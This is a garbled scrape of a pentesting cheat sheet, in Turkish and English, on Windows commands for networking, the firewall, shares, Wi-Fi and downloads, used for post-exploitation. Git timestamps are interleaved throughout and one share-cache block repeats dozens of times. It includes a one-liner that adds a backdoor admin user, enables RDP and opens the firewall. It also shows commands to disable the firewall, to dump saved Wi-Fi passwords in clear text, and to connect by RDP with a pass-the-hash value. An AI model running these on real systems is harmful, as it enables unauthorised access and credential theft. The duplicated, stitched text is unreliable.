# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
## Ağ
### Arayüzler, Rotalar, Portlar, Ana Bilgisayarlar ve DNS Önbelleği
Arayüzler, ağa bağlı cihazları n ağ trafiğini alı p ileten noktalardı r. Arayüzlerin IP adresleri, alt ağ maskeleri ve diğer ağ yapı landı rmaları vardı r.
Rotalar, ağ trafiğini yönlendiren yolları belirtir. Bir cihazı n birden fazla ağa bağlı olması durumunda, rotalar trafiği doğru hedefe yönlendirmek için kullanı lı r.
Portlar, ağ üzerindeki iletişim için belirlenmiş numaralardı r. Her bir port, belirli bir hizmete veya protokole atanmı ştı r.
Ana bilgisayarlar, ağ üzerindeki diğer cihazlarla iletişim kurmak için kullanı lan cihazlardı r. Her bir ana bilgisayarı n benzersiz bir IP adresi vardı r.
DNS önbelleği, DNS sorguları nı n sonuçları nı geçici olarak saklayan bir mekanizmadı r. Bu, daha hı zlı ve verimli DNS çözümlemesi sağlar.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Güvenlik Duvarı
Bir güvenlik duvarı , ağ trafiğini kontrol etmek ve istenmeyen erişimleri engellemek için kullanı lan bir güvenlik önlemidir. Windows işletim sistemlerinde, Windows Güvenlik Duvarı adı verilen bir güvenlik duvarı bulunmaktadı r. Bu güvenlik duvarı , gelen ve giden ağ trafiğini denetler ve belirli ağ protokollerini veya bağlantı noktaları nı engelleyebilir.
#### Güvenlik Duvarı Durumunu Kontrol Etme
Güvenlik duvarı nı n etkin olup olmadı ğı nı kontrol etmek için aşağı daki komutu kullanabilirsiniz:
```plaintext
netsh advfirewall show allprofiles
```
Bu komut, güvenlik duvarı nı n etkin olup olmadı ğı nı ve hangi profillerde (genel, özel, etki alanı ) etkin olduğunu gösterir.
#### Güvenlik Duvarı nı Etkinleştirme veya Devre Dı şı Bı rakma
Güvenlik duvarı nı etkinleştirmek veya devre dı şı bı rakmak için aşağı daki komutları kullanabilirsiniz:
```plaintext
netsh advfirewall set allprofiles state on
```
```plaintext
netsh advfirewall set allprofiles state off
```
İlk komut, güvenlik duvarı nı etkinleştirirken, ikinci komut güvenlik duvarı nı devre dı şı bı rakı r.
#### Güvenlik Duvarı Kuralları nı Yönetme
Güvenlik duvarı kuralları nı yönetmek için aşağı daki komutları kullanabilirsiniz:
2024-04-06 19:40:41 +00:00
* Kuralları Listeleme:
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall show rule name=all
```
Bu komut, tüm güvenlik duvarı kuralları nı listeler.
2024-04-06 19:40:41 +00:00
* Kuralları Ekleme:
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall add rule name="Rule Name" dir=in action=allow protocol=TCP localport=12345
```
Bu komut, belirli bir kural adı yla gelen TCP trafiğini belirtilen bir bağlantı noktası na izin veren bir kural ekler.
2024-04-06 19:40:41 +00:00
* Kuralları Silme:
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall delete rule name="Rule Name"
```
Bu komut, belirli bir kural adı na sahip olan bir güvenlik duvarı kuralı nı siler.
#### Özet
Bu bölümde, Windows işletim sistemlerindeki güvenlik duvarı nı kontrol etme, etkinleştirme/devre dı şı bı rakma ve kuralları yönetme konuları nı ele aldı k. Güvenlik duvarı , ağ trafiğini kontrol etmek ve istenmeyen erişimleri engellemek için önemli bir güvenlik önlemidir.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Paylaşı mlar
```plaintext
C:\> net share
```
Bu komut, bir Windows sistemdeki mevcut paylaşı mları listeler.
```plaintext
C:\> net share < share_name >
```
Bu komut, belirli bir paylaşı mı n ayrı ntı ları nı görüntüler.
```plaintext
C:\> net share < share_name > /delete
```
Bu komut, belirli bir paylaşı mı siler.
```plaintext
C:\> net share < share_name > =< path > /grant:< user > ,< permissions >
```
Bu komut, belirli bir kullanı cı ya belirli bir paylaşı ma erişim izni verir.
```plaintext
C:\> net share < share_name > =< path > /unlimited
```
Bu komut, belirli bir paylaşı mı n maksimum kullanı cı sayı sı nı sı nı rsı z yapar.
```plaintext
C:\> net share < share_name > =< path > /remark:"< comment > "
```
Bu komut, belirli bir paylaşı m için bir açı klama ekler.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:None
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:None
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
```
2020-08-30 21:17:43 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:None
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
2022-05-17 09:34:10 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
2020-08-17 14:38:36 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
2022-05-17 09:34:10 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
2020-08-17 14:38:36 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
2022-05-17 09:34:10 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
2022-05-17 09:34:10 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Documents
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini belgeler olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Programs
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini programlar olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:BranchCache
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini BranchCache olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:None
```
2022-10-05 00:11:28 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini devre dı şı bı rakı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
```plaintext
C:\> net share < share_name > =< path > /cache:Manual
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini manuel olarak yapı landı rı r.
```plaintext
C:\> net share < share_name > =< path > /cache:Auto
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
Bu komut, belirli bir paylaşı mı n önbelleğini otomatik olarak yapı landı rı r.
2020-07-15 15:43:14 +00:00
2024-04-06 19:40:41 +00:00
````plaintext
2024-02-10 18:14:16 +00:00
C:\> net share < share_name
2020-07-15 15:43:14 +00:00
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
2024-04-06 19:40:41 +00:00
````
2022-05-17 09:34:10 +00:00
### Wifi
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
#### Windows
2024-04-06 19:40:41 +00:00
**List Available Wifi Networks**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan show networks
```
2024-04-06 19:40:41 +00:00
**Connect to a Wifi Network**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan connect name="WifiName" ssid="WifiSSID"
```
2024-04-06 19:40:41 +00:00
**Disconnect from a Wifi Network**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan disconnect
```
2024-04-06 19:40:41 +00:00
**Show Saved Wifi Profiles**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan show profiles
```
2024-04-06 19:40:41 +00:00
**Show Password of a Saved Wifi Profile**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan show profile name="WifiProfileName" key=clear
```
2024-04-06 19:40:41 +00:00
**Delete a Saved Wifi Profile**
2024-02-10 18:14:16 +00:00
```plaintext
netsh wlan delete profile name="WifiProfileName"
```
#### Linux
2024-04-06 19:40:41 +00:00
**List Available Wifi Networks**
2024-02-10 18:14:16 +00:00
```plaintext
nmcli device wifi list
```
2024-04-06 19:40:41 +00:00
**Connect to a Wifi Network**
2024-02-10 18:14:16 +00:00
```plaintext
nmcli device wifi connect SSID password PASSWORD
```
2024-04-06 19:40:41 +00:00
**Disconnect from a Wifi Network**
2024-02-10 18:14:16 +00:00
```plaintext
nmcli device disconnect wlan0
```
2024-04-06 19:40:41 +00:00
**Show Saved Wifi Profiles**
2024-02-10 18:14:16 +00:00
```plaintext
ls /etc/NetworkManager/system-connections/
```
2024-04-06 19:40:41 +00:00
**Show Password of a Saved Wifi Profile**
2024-02-10 18:14:16 +00:00
```plaintext
sudo cat /etc/NetworkManager/system-connections/WifiProfileName | grep psk=
```
2024-04-06 19:40:41 +00:00
**Delete a Saved Wifi Profile**
2024-02-10 18:14:16 +00:00
```plaintext
sudo rm /etc/NetworkManager/system-connections/WifiProfileName
```
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile < SSID > key=clear #Get Cleartext Pass
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
SNMP (Simple Network Management Protocol), basit bir ağ yönetim protokolüdür. SNMP, ağ cihazları nı n durumunu izlemek, performans istatistiklerini toplamak ve ağ yönetimi için bilgi sağlamak için kullanı lı r. SNMP, ağ cihazları na yönelik saldı rı lar için bir hedef olabilir. Saldı rganlar, SNMP protokolünü kullanarak ağ cihazları na yetkisiz erişim elde edebilir veya ağ cihazları nı n yapı landı rması nı değiştirebilir. SNMP saldı rı ları ndan korunmak için aşağı daki önlemleri alabilirsiniz:
2020-07-15 15:43:14 +00:00
2024-04-06 19:40:41 +00:00
* SNMP sürümünü güncelleyin ve en son güvenlik yamaları nı uygulayı n.
* SNMP topluluk dizesini güçlü bir parola ile değiştirin.
* SNMP trafiğini şifreleyin veya güvenli bir kanal üzerinden iletişim kurun.
* SNMP erişimini sı nı rlayı n ve yalnı zca güvenilir IP adreslerinden gelen isteklere izin verin.
* SNMP hizmetini gereksiz yere devre dı şı bı rakı n veya kullanı lmayan SNMP özelliklerini devre dı şı bı rakı n.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
SNMP saldı rı ları na karşı bu önlemleri alarak ağı nı zı daha güvenli hale getirebilirsiniz.
2024-04-06 19:40:41 +00:00
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Ağ Arayüzleri
Network interfaces, also known as network adapters or NICs (Network Interface Cards), are hardware devices that allow a computer to connect to a network. They provide the physical connection between the computer and the network, enabling data transmission.
Ağ arayüzleri, aynı zamanda ağ adaptörleri veya NIC'ler (Network Interface Cards) olarak da bilinen donanı m cihazlardı r. Bir bilgisayarı n bir ağa bağlanması nı sağlarlar. Bilgisayar ve ağ arası nda fiziksel bağlantı yı sağlayarak veri iletimini mümkün kı larlar.
In Windows, you can view the network interfaces using the `ipconfig` command. Open a command prompt and type `ipconfig` to display the network configuration information.
Windows'ta, ağ arayüzlerini `ipconfig` komutunu kullanarak görüntüleyebilirsiniz. Bir komut istemi açı n ve ağ yapı landı rma bilgilerini görüntülemek için `ipconfig` yazı n.
The output will show a list of network interfaces along with their IP addresses, subnet masks, and default gateways. Each interface will have a unique identifier called the MAC address.
Çı ktı , ağ arayüzlerinin IP adresleri, alt ağ maskeleri ve varsayı lan ağ geçitleri ile birlikte bir liste olarak gösterilir. Her arayüzün bir MAC adresi adı verilen benzersiz bir tanı mlayı cı sı vardı r.
You can also use the `netsh` command to manage network interfaces. For example, you can use `netsh interface show interface` to display a list of all network interfaces on the system.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Ayrı ca, ağ arayüzlerini yönetmek için `netsh` komutunu da kullanabilirsiniz. Örneğin, `netsh interface show interface` komutunu kullanarak sistemdeki tüm ağ arayüzlerinin bir listesini görüntüleyebilirsiniz.
2020-08-17 14:38:36 +00:00
2024-02-10 18:14:16 +00:00
Understanding the network interfaces on a system is important for various tasks, such as troubleshooting network connectivity issues, configuring network settings, or performing network-based attacks during penetration testing.
Bir sistemdeki ağ arayüzlerini anlamak, ağ bağlantı sı sorunları nı giderme, ağ ayarları nı yapı landı rma veya penetrasyon testi sı rası nda ağ tabanlı saldı rı lar gerçekleştirme gibi çeşitli görevler için önemlidir.
2024-04-06 19:40:41 +00:00
2020-08-17 14:38:36 +00:00
```bash
ipconfig /all
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### ARP tablosu
ARP (Address Resolution Protocol), bir IP adresinin bir MAC adresine nası l eşlendiğini belirlemek için kullanı lan bir protokoldür. ARP tablosu, bir cihazı n ağdaki diğer cihazları n IP adresleri ile ilişkili MAC adreslerini tuttuğu bir veritabanı dı r. Bu tablo, ağ trafiğini yönlendirmek ve hedef cihazlara doğru paketleri iletmek için kullanı lı r.
2020-08-17 14:38:36 +00:00
2024-02-10 18:14:16 +00:00
ARP tablosunu görüntülemek için aşağı daki komutu kullanabilirsiniz:
```plaintext
arp -a
```
2020-08-17 14:38:36 +00:00
2024-02-10 18:14:16 +00:00
Bu komut, ARP tablosundaki tüm girişleri listeleyecektir. Her giriş, bir IP adresi ve ona karşı lı k gelen bir MAC adresi içerir. ARP tablosu, ağdaki cihazlarla iletişim kurarken IP adreslerini MAC adreslerine çevirmek için kullanı lı r.
2024-04-06 19:40:41 +00:00
2020-08-17 14:38:36 +00:00
```bash
arp -A
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
## İndirme
2020-09-05 18:55:40 +00:00
Bitsadmin.exe
2024-04-06 19:40:41 +00:00
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
CertReq.exe, also known as Certificate Request Processor, is a command-line tool used for managing certificate requests and certificates in Windows operating systems. It is commonly used by system administrators and security professionals for tasks related to certificate management.
CertReq.exe allows users to generate certificate requests, submit them to a certification authority (CA), retrieve issued certificates, and perform various operations on certificates, such as installing, exporting, and deleting them.
To use CertReq.exe, you need to open a command prompt and run the tool with the appropriate command-line options. Here are some commonly used commands:
2020-09-05 18:55:40 +00:00
2024-04-06 19:40:41 +00:00
